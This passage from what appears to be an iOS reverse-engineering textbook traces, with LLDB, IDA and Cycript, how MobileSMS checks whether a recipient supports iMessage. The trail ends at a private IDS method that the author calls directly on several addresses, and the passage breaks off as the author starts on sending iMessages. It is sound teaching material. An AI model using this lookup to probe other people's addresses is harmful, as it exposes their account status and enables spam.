source A is *(SP2 + 0x14). No instruction inside sub_26984444 has written to this address before 
“LDR.W R8, [R7,#8] ”, so the value of *(SP2 + 0x14) must come from the caller of 
sub_26984444. Similarly, R1 is read without being written inside sub_26984444, it must also 
come from the caller of sub_26984444, right? If you are still confused, please revie w this 
paragraph until you understand it clearly, and then you ’re allowed to continue.  
Alright, both the 13th data source A and the 11th data source B come from the caller of 
sub_26984444. So our next specific task is to find the 14th data source A and the  12th data source 
B in the caller of sub_26984444.  
Reinput the recipient ’s address, set a breakpoint at the beginning of sub_26984444, then 

 
373 press “return”  to trigger the breakpoint:  
Process 30928 stopped 
* thread #1: tid = 0x78d0, 0x30b36444  ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke,  queue = 'com.apple.main -
thread, stop reason = breakpoint  7.1 
    frame #0: 0x30b36444  ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withComple tionBlock:]_block_invoke  
ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke:  
-> 0x30b36444:   push   {r4, r5, r6, r7, lr} 
   0x30b36446:   add    r7, sp, #12 
   0x30b36448:   str    r8, [sp, #-4]! 
   0x30b3644c:   sub    sp, #4 
(lldb) p/x $lr 
(unsigned  int) $39 = 0x331f0d75  
LR without offset is 0x331f0d75 – 0xa1b2000 = 0x2903ED75, which is outside ChatKit. 
Under such circumstance, how can we locate the image where 0x2903ED75 is? We ’ve talked 
about the solution in chapter 6, which is simply set a breakpoint at the end of sub_26984444 and 
keep executing “ ni” to enter the internal of caller and identify the image. The commands are as 
follows: 
Process 30928 stopped 
* thread #1: tid = 0x78d0, 0x30b364c0  ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke  + 124, queue = 
'com.apple.main -thread, stop reason = breakpoint  8.1 
    frame #0: 0x30b364c0  ChatKit`__71 -[CKPendingConversation  
refreshStat usForAddresses:withCompletionBlock:]_block_invoke  + 124 
ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke  + 124: 
-> 0x30b364c0:   pop    {r4, r5, r6, r7, pc} 
   0x30b364c2:   nop     
 
ChatKit`__copy_helper_block _: 
   0x30b364c4:   ldr    r1, [r1, #20] 
   0x30b364c6:   adds   r0, #20 
(lldb) ni 
Process 30928 stopped 
* thread #1: tid = 0x78d0, 0x331f0d74  IMCore`___lldb_unnamed_function425$$IMCore  + 1360, 
queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x331f0d74  IMCore`___lldb_unnamed_function425$$IMCore  + 1360 
IMCore`___lldb_unnamed_function425$$IMCore  + 1360: 
-> 0x331f0d74:   movw   r0, #26972 
   0x331f0d78:   movt   r0, #2081 
   0x331f0d7c:   add    r0, pc 
   0x331f0d7e:   ldr    r1, [r0] 
We’re inside IMCore now. Since we have just calculated the value of LR without offset to 
be 0x2903ED75, as well IMCore shares the same ASLR offset with ChatKit, so just drag and drop 
IMCore into IDA and jump to 0x2903ED75 when the initial analysis has been finished, as shown 
in figure 10- 34. 
 
374  
Figure 10-  34 Caller of sub_26984444  
See, another implicit call from sub_2903E824, and 2 of 4 instructions before “BLX R6”  has 
relation with SP. To make it more convenient for reading, I ’ll take instructions befor e and after 
calling "BLX R6" from their respective images and put them together into one figure. The 
process and result is shown in figure 10 -35 and figure 10 -36. 

 
375  
Figure 10-  35 Before instructions of 2 images are put together  
 
Figure 10-  36 After instructions of 2 images are put together  
Let’s keep looking for the 14th data source A, which has been written into *(SP2 + 0x14), do 
you still remember? OK, mark the SPs in loc_2903ED6A just like what we ’ve done, as shown in 
figure 10- 37. 

 
376  
Figure 10-  37 Mark SPs 
Then we should go through loc_2903ED6A from its 1st instruction to check how SP 
changes here.  
“LDR R3, [SP,#0xA8+v ar_98]”  equals to R3 = *(SP1 + 0xA8 + var_98). And var_98 = -
0x98, as shown in figure 10 -38. 
 
Figure 10-  38 sub_2903e824  
As a result, R3 = *(SP1 + 0x10) and this instruction has no influence on the value of SP. 
“MOV R2, R8 ” has nothing to do with SP; the value of var_A8 in “ STR R1, 
[SP,#0xA8+var_A8] ” is -0xA8, so *SP1 = R1, which doesn ’t influence SP too; “MOV R1, R5 ” has 
nothing to do with SP either. These SPs are really confusing for sure, so take a break and let me 
summarize it.  
Our goal is to find where *(SP2 + 0x14) is written.  

 
377 Because SP2 = SP1 - 0x14 and *SP1 = R1, 
Therefore, “STR R1, [SP,#0xA8+var_A8] ” is the place where *(SP2 + 0x14) is written, and 
R1 in this instruction is the 14th data source A! Also,  we can easily find that R5 in “MOV R1, R5 ” 
is the 12th data source B. The logics of tracing from 13th data source A to 14th data source A 
and from 11t h data source B to 12th data source B go across images, bringing high complexity. 
With the illustration of figure 10 -39, I hope everything is more intuitive. We strongly suggest 
you comb through everything by referring to this figure before moving on to th e next 
paragraph.  
 
Figure 10-  39 How data sources evolve  
Before we continue our analysis, let ’s verify our deduction so far with LLDB: reinput the 
address and set the breakpoint on “STR R1, [SP,#0xA8+var_A8] ” to print R1, i.e. the 14t h data 
source A. Next, execute “ni” until we reach “MOV R1, R5 ”, print R5 i.e. the 12th data source B. 
Then we ’ll experience an image switch from IMCore to ChatKit, so exe cute “ si” to reach “ CMP 
R0, #2”  and print R0, i.e. the 13th data  source A. Finally, w e execute “ ni” until “ TST.W R1, 
#0xFF ” to print R1, i.e. the 11th data source B. Press “return”  to trigger the breakpoint and 
follow the above steps to check whether their values equal to each other like figure 10 -39 shows.  
(lldb) br s -a 0x30230D6E 
Process 37477 stopped 
* thread #1: tid = 0x9265, 0x30230d6e  IMCore`___lldb_unnamed_function425$$IMCore  + 1354, 
queue = 'com.apple.main -thread, stop reason = breakpoint  11.1 
    frame #0: 0x30230d6e  IMCore`___lldb_unnamed_function425$$IMCore  + 1354 
IMCore`___lldb _unnamed_function425$$IMCore  + 1354: 
-> 0x30230d6e:   str    r1, [sp] 

 
378    0x30230d70:   mov    r1, r5 
   0x30230d72:   blx    r6 
   0x30230d74:   movw   r0, #26972 
(lldb) p $r1 
(unsigned  int) $27 = 0 
(lldb) ni 
Process 37477 stopped 
* thread #1: tid = 0x9265, 0x30230d70  IMCore`___lldb_unnamed_function425$$IMCore  + 1356, 
queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x30230d70  IMCore`___lldb_unnamed_function425$$IMCore  + 1356 
IMCore`___lldb_unnamed_function425$$IMCore  + 1356: 
-> 0x30230d70:   mov    r1, r5 
   0x30230d72:   blx    r6 
   0x30230d74:   movw   r0, #26972 
   0x30230d78:   movt   r0, #2081 
(lldb) p $r5 
(unsigned  int) $28 = 1 
(lldb) ni 
Process 37477 stopped 
* thread #1: tid = 0x9265, 0x30230d72  IMCore`___lldb_unnamed_functi on425$$IMCore  + 1358, 
queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x30230d72  IMCore`___lldb_unnamed_function425$$IMCore  + 1358 
IMCore`___lldb_unnamed_function425$$IMCore  + 1358: 
-> 0x30230d72:   blx    r6 
   0x30230d74:   movw   r0, #26972 
   0x30230d78:   movt   r0, #2081 
   0x30230d7c:   add    r0, pc 
(lldb) si 
Process 37477 stopped 
* thread #1: tid = 0x9265, 0x2db76444  ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke,  queue = 'com.apple.main -
thread, stop reason = instruction  step into 
    frame #0: 0x2db76444  ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke  
ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompl etionBlock:]_block_invoke:  
-> 0x2db76444:   push   {r4, r5, r6, r7, lr} 
   0x2db76446:   add    r7, sp, #12 
   0x2db76448:   str    r8, [sp, #-4]! 
   0x2db7644c:   sub    sp, #4 
(lldb) ni 
...... 
Process 37477 stopped 
* thread #1: tid = 0x9265, 0x2db7645c  ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke  + 24, queue = 
'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x2db7645c  ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresse s:withCompletionBlock:]_block_invoke  + 24 
ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke  + 24: 
-> 0x2db7645c:   cmp    r0, #2 
   0x2db7645e:   bne    0x2db7647a                 ; __71-[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke  + 54 
   0x2db76460:   movw   r0, #19376 
   0x2db76464:   movt   r0, #2535 
(lldb) p $r0 
(unsigned  int) $29 = 0 
(lldb) ni 
...... 
Process 37477 stopped 
 
379 * thread #1: tid = 0x9265, 0x2db7647e  ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke  + 58, queue = 
'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x2db7647e  ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletion Block:]_block_invoke  + 58 
ChatKit`__71 -[CKPendingConversation  
refreshStatusForAddresses:withCompletionBlock:]_block_invoke  + 58: 
-> 0x2db7647e:   tst.w  r1, #255 
   0x2db76482:   movt   r0, #2535 
   0x2db76486:   add    r0, pc 
   0x2db76488:   ldr    r0, [r0] 
(lldb) p $r1 
(unsigned  int) $30 = 1 
The output verifies our analysis, the 14th data source A is 0 and 12th data source B is 1. 
Next, we need to focus on IMCore to keep looking for 15th data source A and 13th data source 
B. Let ’s get started from the 15th data source A.  
The 15th data source A is presented in figure 10 -40 intuitively.  
 
Figure 10-  40 15th data source A  
It comes either from "MOVS R1, #1" or "MOVS R1, #0". In other words, the 15th data 
source A is either 0 or 1. Things are getting interesting.  
If I remember correctly , since the 11th data source A, the value of data source A has never 
changed, the values of 11th, 12th, 13th, 14th and 15th data source A are all the same, which are 
either 0 or 1. However, the previous pseudo code is like this:  
- (BOOL)supportIMessage 
{ 
 if (11thDataSourceA  == 2 || 11thDataSourceB!=  0) return YES; 
 return NO; 
} 
Because the 11th data source A is either 0 or 1, under no circumstance can it be 2. In that 
case, data source A becomes meaningless in our tracing, right? Hence the pseudo code can be 
simplified as follows:  
- (BOOL)supportIMessage  

 
380 { 
 if (11thDataSourceB  != 0) return YES; 
 return NO; 
} 
As a result, we can ignore data source A and concentrate on the finding of the 13th data 
source B, hereafter referred to as the 13th data source. Since the 12th data source B is R5, we can 
confirm that 13th data source must be written into R5 by a certain instruction, right? Click R5 
and IDA will highlight all R5s as yellow to make it more convenient for tracing in the sea of 
ARM assembly. Keep reversing to find where R5 is written.  
When we ’re searching upward to locate the 13th data source, we see there ’re 4 branches to 
loc_2903EAE0, as shown in figure 10 -41. 
 
Figure 10-  41 loc_2903EAE0  
In figure 10 -41, the left 3 branches all  contain a "MOVS R5, #0", which contradicts the 
result of R5 = 1, so loc_2903EAE0 must be reached via the rightmost branch, and the 13th data 
source should be located in this branch. Follow this branch for R5.  
When we trace into loc_2903EA3E, the situation  is similar to loc_2903EAE0. Although 
there are 3 branches upon it, the 1st and 2nd branches both contain a "MOVS R5, #0" as shown 
in figure 10- 42, so they can be excluded for now.  
 
Figure 10-  42 loc_2903EA3E  
As a result, the actual upstream is the 3rd branch, i.e. loc_2903E9C4, which has 2 branches 

 
381 upon it. Now that both branches contain “MOVS R5, #1 ”, which is the actual one?  
Reinput the address and set breakpoints on both  branches. Then press “return”  to see which 
breakpoint will be triggered, that’ s our answer. Here, I ’ll leave the LLDB operation to you, 
please finish it independently. After you ’ve done, you will have a deeper understanding and find 
that the left branch is the actual one MobileSMS chose, as shown in figure 10 -43. 
 
Figure 10-  43 The left branch  
Now, we have found the 13th data source, it ’s a constant with value 1. You may wonder, if 
13th data source is a constant, does 14th data source still exist? The data source clues seem to be 
interrupted , what should we to do next? Good point.  
In the previous figures, there ’re several “ MOVS R5, #0 ”. Although the 13th data source 
comes from “MOVS R5, #1 ”, which seems to be a constant, according to programmatic 
paradigm, there should be a conditional branch to determine whether “ MOVS R5, #0 ” or 
“MOVS R5, #1 ” gets executed, just like the pseudo code below.  
if (iMessageIsAvailable)  R5 = 1; 
else R5 = 0; 
To r epresent in our familiar IDA graph view, it looks like figure 10 -44. 

 
382  
Figure 10-  44 Pseudo IDA graph view  
From  a macro  point of view,  this conditional branch  is actually  the 14th  data source, right? I 
bet you ’ve realized that the above pseudo code can be rewritten as below:  
R5 = iMessageIsAvailable;  
If you can understand this, then our next task is to keep tracing back to analyze every 
branch we meet. If different branches result in writing different values into R5, we need to 
figure out what ’s the branch  condition, and this condition is our target data source. Let ’s head to 
figure 10- 45 and start from here.  
 
Figure 10-  45 Branch  
If the process branches left, R5 is possibly to be set 0. Since the branch condition is the 

 
383 return value of objc_msgSend, let ’s set a breakpoint here and see what method it is:  
Process 132234 stopped 
* thread #1: tid = 0x2048a,  0x331f092e  IMCore`___lldb_unnamed_function425$$IMCore  + 266, 
queue = 'com.apple.main -thread, stop reason = breakpoint  5.1 
    frame #0: 0x331f092e  IMCore`___lldb_unnamed_function425$$IMCore  + 266 
IMCore`___lldb_unnamed_function425$$IMCore  + 266: 
-> 0x331f092e:   blx    0x332603b0                 ; symbol stub for: objc_msgSend  
   0x331f0932:   mov    r8, r0 
   0x331f0934:   cmp.w  r8, #0 
   0x331f0938:   bne    0x331f08e2                 ; ___lldb_unnamed_function425$$IMCore  + 
190 
(lldb) p (char *)$r1 
(char *) $6 = 0x2f7d81d9  "countByEnumeratingWithState:objects:count:"  
(lldb) po $r0 
<__NSArrayI  0x16706930>(  
mailto:snakeninny@gmail.com  
) 
As we can see, this method returns the count of the recipient array. If the array is not 
empty, MobileSMS will branch right. Actually, the recipient array is not empty, therefore this 
branch condition is not met, MobileSMS will branch right, which doesn’ t change R5. OK, search 
upward for the next branch, as shown in figure 10 -46. 
 
Figure 10-  46 Branch  
In figure 10 -46, what are R11 and R8 respectively? We can get a straightforward answer 
from IDA that R11 is from figure 10- 47. 
 
Figure 10-  47 loc_2903e8e2  
The initial value of R11 is 0. Each time before executing “CMP R11, R8 ”, R11 will increase 
by 1. In this way, R1 1 plays the role of a counter. “CMP ” performs subtraction operation, if 
there ’s borrow, then carry flag will be set 0, otherwise carry flag will be set 1. The branch 
instruction here is “ BCC ”, in which “CC”  means “Carry Clear” , i.e. “ if carry flag is 0” . 

 
384 Therefore, if R11 - R8 produces borrow, i.e. R8 is greater than R11, then Mobil eSMS will branch 
right, otherwise it will branch left. So the key here is R8, as shown in figure 10 -48. 
 
Figure 10-  48 Where R8 comes  
R8 comes from [NSArray countByEnumeratingWithState:objects:count:]. Reinput the 
address, set the breakpoint and press “return” , let’ s see what NSArray is:  
(lldb) br s -a 0x3023089C  
Breakpoint  2: where = IMCore`___lldb_unnamed_function425$$IMCore  + 120, address = 
0x3023089c  
Process 102482 stopped 
* thread #1: tid = 0x19052,  0x3023089c  IMCore`___lldb_unnamed_function425$$IMC ore + 120, 
queue = 'com.apple.main -thread, stop reason = breakpoint  2.1 
    frame #0: 0x3023089c  IMCore`___lldb_unnamed_function425$$IMCore  + 120 
IMCore`___lldb_unnamed_function425$$IMCore  + 120: 
-> 0x3023089c:   blx    0x302a03b0                 ; symbol stub for: objc_msgSend  
   0x302308a0:   mov    r8, r0 
   0x302308a2:   cmp.w  r8, #0 
   0x302308a6:   beq.w  0x302309c2                 ; ___lldb_unnamed_function425$$IMCore  + 
414 
(lldb) p (char *)$r1 
(char *) $5 = 0x2c8181d9  "countByEnumeratingWithState:objec ts:count:"  
(lldb) po $r0 
<__NSArrayI  0x178d6b20>(  
mailto:snakeninny@gmail.com  
) 
NSArray is an array of recipients, thus R8 is the recipient count. If there ’s more than 1 
recipients, then since R11 is 1 when “CMP R11, R8 ” gets executed for the first time, we can 
know that R8 is greater than R11 and MobileSMS will branch right, as shown in figure 10 -49. 

 
385  
Figure 10-  49 Branch  
The branch condition inside loc_2903E8E6 is R0. If R0 == 0, then branch left, meaning this 
address doesn ’t support iMessage. Otherwise branch right and reach figure 10 -50.  
 
Figure 10-  50 Branch  
The branch condition in figure 10 -50 is still R0. If R0 == 2 then branch left, iMessage is not 
supported. Otherwise branch right and go back to figure 10 -46. N ote, these 3 blocks of code 
don’ t change the value of R8. As a result, R0 at the bottom of loc_2903E8E6 is very import; as 
long as R0 != 0 && R0 != 2, the branch in figure 10 -46 is useless. That’ s because R11 keeps 
increasing while R8 stays the same, MobileSMS will eventually branch left and come to the 
conclusion that iMessage is supported. So judging from all information above, we can think of 
R0 as the essential branch condition in this loop. Do you still remember what I ’ve just said? “ If 
different branches result in writing different values into R5, we need to figure out what ’s the 
branch condition, and this condition is our target data source ”. Thus, R0 is the 14th data source.  
Next, let’ s check with LLDB what are these objc_msgSends in figure 10 -49, as well the 

 
386 source of R0:  
Process 154446 stopped 
* thread #1: tid = 0x25b4e,  0x331f0900  IMCore`___lldb_unnamed_function425$$IMCore  + 220, 
queue = 'com.apple.main -thread, stop reason = breakpoint  1.1 
    frame #0: 0x331f0900  IMCore`___lldb_unnamed_function425$$IMCore  + 220 
IMCore`___lldb_unnamed_function425$$IMCore  + 220: 
-> 0x331f0900:   blx    0x332603b0                 ; symbol stub for: objc_msgSend  
   0x331f0904:   ldr    r0, [sp, #40] 
   0x331f0906:   mov    r2, r4 
   0x331f0908:   ldr    r1, [sp, #20] 
(lldb) p (char *)$r1 
(char *) $7 = 0x2f7d897a  "removeObject:"  
(lldb) po $r0 
<__NSArrayM  0x170ec120>(  
mailto:snakeninny@gmail.com  
) 
 
(lldb) po $r2 
mailto:snakeninny@gmail.com  
(lldb) ni 
...... 
Process 154446 stopped 
* thread #1: tid = 0x25b4e,  0x331f090a  IMCore`___lldb_unnamed_function425$$IMCore  + 230, 
queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x331f090a  IMCore`___lldb_unnamed_function425$$IMCore  + 230 
IMCore`___lldb_unn amed_function425$$IMCore  + 230: 
-> 0x331f090a:   blx    0x332603b0                 ; symbol stub for: objc_msgSend  
   0x331f090e:   ldr    r1, [sp, #24] 
   0x331f0910:   blx    0x332603b0                 ; symbol stub for: objc_msgSend  
   0x331f0914:   cbz    r0, 0x331f0946             ; ___lldb_unnamed_function425$$IMCore  + 
290 
(lldb) p (char *)$r1 
(char *) $10 = 0x2f7d8113  "valueForKey:"  
(lldb) po $r2 
mailto:snakeninny@gmail.com  
(lldb) po $r0 
{ 
    "mailto:snakeninny@gmail.com"  = 1; 
} 
(lldb) po [$r0 class] 
__NSCFDictionary  
(lldb) ni 
...... 
Process 154446 stopped 
* thread #1: tid = 0x25b4e,  0x331f0910  IMCore`___lldb_unnamed_function425$$IMCore  + 236, 
queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x331f0910  IMCore`___lldb_unnamed_function425$$IMCore  + 236 
IMCore`___lldb_unnamed_function425$$IMCore  + 236: 
-> 0x331f0910:   blx    0x332603b0                 ; symbol stub for: objc_msgSend  
   0x331f0914:   cbz    r0, 0x331f0946             ; ___lldb_unnamed_function42 5$$IMCore  + 
290 
   0x331f0916:   cmp    r0, #2 
   0x331f0918:   beq    0x331f09ca                 ; ___lldb_unnamed_function425$$IMCore  + 
422 
(lldb) p (char *)$r1 
(char *) $14 = 0x2f7de6f3  "integerValue"  
(lldb) po $r0 
1 
(lldb) po [$r0 class] 
 
387 __NSCFNumber  
(lldb) c 
Reproduce  these 3 objc_msgSends into Objective -C methods, t hey are [NSArray 
removeObject:@ "mailto:snakeninny@gmail.com"], [NSDictionary 
valueForKey: @"mailto:snakeninny@gmail.com"] and [NSNumber integerValue] respectively. 
Among them, R0 of the 2nd objc_msgSend deserves our special attention. It is the key -value 
pair in this R0 (an NSDictionary) that determines the 14th data source. Therefore, this 
NSDictionary is the 15th data source. According to figure 10 -49, we can know that it comes 
from [SP,#0xA8+var_80], which means [SP,#0xA8+var_80] is the 16th data source. Here comes our familiar operation to trace the 17th data source; inspect the cross references to 
var_80 as shown in figure 10 -51. 
 
Figure 10-  51 Inspect cross references  
As we can see, only one instruction writes into this address. Double click this instruction to 
jump to the beginning of sub_2903E824, as shown in figure 10 -52. 

 
388  
Figure 10-  52 sub_2903E824  
The 16th data source comes from R5, which is the 17th data source. The 17th data source is 
from R1, which is the 18th data source, and it is read without being written, meaning R1 comes 
from the caller of sub_2903E824, right? Let ’s take a look at the subroutine ’s cross references, as 
shown in figure 10 -53. 
 
Figure 10-  53 Inspect cross  references 
“Calculate service for sending new compose ”, as the name suggests, its function is quite 
clear. Double click the first cross reference to check its caller, as shown in figure 10 -54. 

 
389  
Figure 10-  54 Caller of sub_2903E824  
To avoid any implicit c alling, let ’s first make sure the caller of sub_2903E824 is actually 
IMChatCalculateServiceForSendingNewCompose. Reinput the address, set a breakpoint at the 
first instruction of sub_2903E824 and then press “return”  to trigger the breakpoint:  
Process 154446 stopped 
* thread #1: tid = 0x25b4e, 0x331f0824 IMCore`___lldb_unnamed_function425$$IMCore,  queue 
= 'com.apple.main -thread, stop reason = breakpoint  2.1 
    frame #0: 0x331f0824  IMCore`___lldb_unnamed_function425$$IMCore  
IMCore`___lldb_unnamed_functi on425$$IMCore:  
-> 0x331f0824:   push   {r4, r5, r6, r7, lr} 
   0x331f0826:   add    r7, sp, #12 
   0x331f0828:   push.w {r8, r10, r11} 
   0x331f082c:   sub    sp, #144 
(lldb) p/x $lr 
(unsigned  int) $17 = 0x331f067b  
(lldb) 
The ASLR offset is 0xa1b2000, so LR without offset is 0x2903E67B, which is exactly inside 
IMChatCalculateServiceForSendingNewCompose. OK, since the 18th data source is from R5, 
then R5 is the 19th data source. Further, the 19th data source is from the return value of 
objc_msgSend, so this re turn value is the 20th data source. With everything ready, let ’s reveal 
this mysterious objc_msgSend:  
Process 154446 stopped 
* thread #1: tid = 0x25b4e,  0x331f0668  IMCore`IMChatCalculateServiceForSendingNewCompose  
+ 688, queue = 'com.apple.main -thread, stop reason = breakpoint  3.1 
    frame #0: 0x331f0668  IMCore`IMChatCalculateServiceForSendingNewCompose  + 688 
IMCore`IMChatCalculateServiceForSendingNewCompose  + 688: 
-> 0x331f0668:   blx    0x332603b0                 ; symbol stub for: objc_msgSend  
   0x331f066c:  mov    r5, r0 
   0x331f066e:   add    r0, sp, #44 
   0x331f0670:   mov    r1, r5 
(lldb) p (char *)$r1 

 
390 (char *) $18 = 0x33274340  "_currentIDStatusForDestinations:service:listenerID:"  
(lldb) po $r0 
<IDSIDQueryController:  0x15dcb010>  
(lldb) po $r2 
<__NSArrayM 0x170e7900>(  
mailto:snakeninny@gmail.com  
) 
 
(lldb) po $r3 
com.apple.madrid  
(lldb) po [$r3 class] 
__NSCFConstantString  
(lldb) x/10 $sp 
0x001e4548:  0x3b3f52b8  0x001e459c  0x3b4227b4  0x3c01b05c  
0x001e4558:  0x00000001  0x00000000  0x170828d0  0x001e4594  
0x001e4568:  0x2baac821  0x00000000  
(lldb) po 0x3b3f52b8  
__kIMChatServiceForSendingIDSQueryControllerListenerID  
(lldb) po [0x3b3f52b8  class] 
__NSCFConstantString  
(lldb) c 
Success belongs to the persevering. This objc_msgSend is restored to 
[[IDSIDQueryController sharedInstance] 
_currentIDStatusForDestinations:@[@"mailto:snakeninny@gmail.com"] 
service:@"com.apple.madrid" 
listenerID:@"__kIMChatServiceForSendingIDSQueryControllerListenerID"]. Since the last 2 
arguments are constants, the only v ariable argument is the first array, i.e. the recipient array. 
What a long journey! We ’ve finally tracked down the original data source! 
I know, I know, this section is so hard that you ’re already dizzy now. Stay up for a while, 
we’re almost done with this  task. 
10.2.5  Restore the process of the original data source becoming 
placeholderText  
Now that we have found the core method, seems we can detect whether an address 
supports iMessage by modifying the first argument, i.e. the NSArray of recipients. As long as the 
key (an address) associated value (an integer) in the return value (an NSDictio nary) is neither 0 
nor 2, we can confirm that this address supports iMessage; otherwise it only supports SMS. Is 
that so? As we already know, the format of email addresses is “mailto:email@address ”, how 
about phone number format? Let ’s set a breakpoint on 
_currentIDStatusForDestinations:service:listenerID and take a look:  
Process 102482 stopped 
 
391 * thread #1: tid = 0x19052,  0x30230668  IMCore`IMChatCalculateServiceForSendingNewCompose  
+ 688, queue = 'com.apple.main -thread, stop reason = breakpoint  6.1 
    frame #0: 0x30230668  IMCore`IMChatCalculateServiceForSendingNewCompose  + 688 
IMCore`IMChatCalculateServiceForSendingNewCompose  + 688: 
-> 0x30230668:   blx    0x302a03b0                 ; symbol stub for: objc_msgSend  
   0x3023066c:   mov    r5, r0 
   0x3023066e:  add    r0, sp, #44 
   0x30230670:   mov    r1, r5 
(lldb) po $r2 
<__NSArrayM  0x17820560>(  
tel:+86PhoneNumber  
) 
OK, we can now turn back to Cycript to verify our assumption:  
FunMaker -5:~ root# cycript -p MobileSMS  
cy# [[IDSIDQueryController  sharedInstance]  
_currentIDStatusForDestinations:@[@"mailto:snakeninny@gmail.com",  
@"mailto:snakeninny@icloud.com",  @"tel:bbs.iosre.com",  @"mailto:bbs.iosre.com",  
@"tel:911",  @"tel:+86PhoneNumber"]  service:@"com.apple.madrid"  
listenerID:@"__kIMChatServiceFo rSendingIDSQueryControllerListenerID"]  
@{"tel:bbs.iosre.com":2,"mailto:snakeninny@gmail.com":1,"tel:911":2,"mailto:bbs.iosre.co
m":2,"mailto:snakeninny@ic loud.com":1,"tel:+86PhoneNumber ":1} 
Aha, the output clearly supports our statements: 2 iMessage suppor tive emails and 1 
iMessage supportive phone number all return 1, while the other 3 iMessage unsupportive 
addresses return 2. What’ s more, we know the code name of iMessage is “Madrid ”. Mission 
complete! Cheers!  
10.3   Send iMessages  
Through the baptism of section  10.2, I believe many of you may share the same feeling with 
me: debugging with LLDB step by step is of course rigorous and precise, but the workload along 
with it is overwhelmingly heavy. Reverse engineering is full of error checks, don ’t be afraid of 
mak ing mistakes. In this section, we ’ll jump out and step up with wild guesses to achieve our 
goal; we ’ll try to avoid massive analysis with LLDB, instead make use of class -dump to filter 
suspicious methods, and test them with IDA and Cycript to finally achie ve our goal of sending 
iMessages.  
10.3.1  Observe MobileSMS and look for cut -in points  
In comparison with detecting iMessages, cut -in point of sending iMessages is more 
noticeable. In figure 10- 55, the bold blue “Send”  button is Apple ’s gift for this section.  
 
392  
Figure 10-  55 “Send ” button  
We can send an iMessage by pressing “Send” , and the whole process will be animated on 
UI. Like what we did in section 10.2, let ’s consider how to turn clues on UI into ideas in reverse 
engineering:  
 “Send”  button is supposed to be a UIView object, or more specifically and possibly, a 
UIButton object; we press this button to call its response method; overall response actions 
include refreshing UI, sending the iMessage, adding a sending record and so on. That ’s to say, 
the action of sending iMessages is only a subset of all response actions.  
In “New Message”  view, our inputs include recipient addresses and message contents, 
they ’re the original data source. Since we can get all response actions, and the action  of sending 
iMessages is supposed to take the original data source as arguments, so they can be references 
for us to filter the action of sending iMessages out of all response actions. Unlike what we ’ve 
done in the last section, which was tracing back from  tail to head, in the following sections, 
we’re tracing from head to tail, showing you another common scenario of iOS reverse 
engineering.  
In a nutshell, our thoughts are: first uncover response method of “Send”  button with 
Cycript, then overview all response actions with IDA and class- dump, as well filter those 
suspicious methods out. Finally, test the filtered methods and locate our target.  

 
393 10.3.2   Find response method of “ Send ” button using Cycript  
Since we’ ve already known that the superview of “Send”  button is a CKMessageEntryView 
object in section 10.2, we can repeat what we ’ve done in section 10.2.2 and get the superview 
without further tests: 
FunMaker -5:~ root# cycript -p MobileSMS  
cy# ?expand 
expand == true 
cy# [UIApp windows]  
@[#"<UIWindow:  0x14e12fa0; frame = (0 0; 320 568); gestureRecognizers  = <NSArray:  
0x14e11f50>;  layer = <UIWindowLayer:  0x14ee4570>>",#"<UITextEffectsWindow:  0x14fa6000;  
frame = (0 0; 320 568); opaque = NO; gestureRecognizers  = <NSArray:  0x14fa66d0>;  layer = 
<UIWindowLayer:  0x14fa5fc0>>",#"<CKJoystickWindow:  0x14d22310;  baseClass  = 
UIAutoRotatingWindow;  frame = (0 0; 320 568); hidden = YES; gestureRecognizers  = 
<NSArray:  0x14d21ab0>;  layer = <UIWindowLayer:  0x14d22140>>"]  
cy# [#0x14fa6000  subviews]  
@[#"<UIInputSetContainerView:  0x14d03930;  frame = (0 0; 320 568); autoresize  = W+H; 
layer = <CALayer:  0x14d03770>>"]  
cy# [#0x14d03930  subviews]  
@[#"<UIInputSetHostView:  0x14d033f0;  frame = (0 250; 320 318); layer = <CALayer:  
0x14d03290>>"]  
cy# [#0x14d033f0  subviews]  
@[#"<UIKBInputBackdropView:  0x160441a0;  frame = (0 65; 320 253); userInteractionEnabled  
= NO; layer = <CALayer:  0x16043b60>>",#"<_UIKBCompatInputView:  0x14f78a20;  frame = (0 
65; 320 253); layer = <CALayer:  0x14f78920>>",#"<CKMessageEntryView:  0x160c6180;  frame = 
(0 0; 320 65); opaque = NO; autoresize  = W; layer = <CALayer:  0x16089920>>"]  
cy# [#0x160c6180  subviews]  
@[#"<_UIBackdropView:  0x16069d40;  frame = (0 0; 320 65); opaque = NO; autoresize  = W+H; 
userInteractionEnabled  = NO; layer = <_UIBackdropViewLayer:  0x14d627c0>>",#"<UIView:  
0x16052920;  frame = (0 0; 320 0.5); layer = <CALayer:  0x160529d0>>",#"<UIButton:  
0x1605a8b0;  frame = (266 27; 53 33); opaque = NO; layer = <CALayer:  
0x16052a00>>",#"<UIButton:  0x14d0b2c0;  frame = (266 30; 53 26); hidden = YES; opaque = 
NO; gestureRecognizers  = <NSArray:  0x160f9800>;  layer = <CALayer:  
0x1605a140>>",#"<UIButton:  0x1606f040;  frame = (15 33.5; 25 18.5); opaque = NO; 
gestureRecognizers  = <NSArray:  0x14d07970>;  layer = <CALayer:  
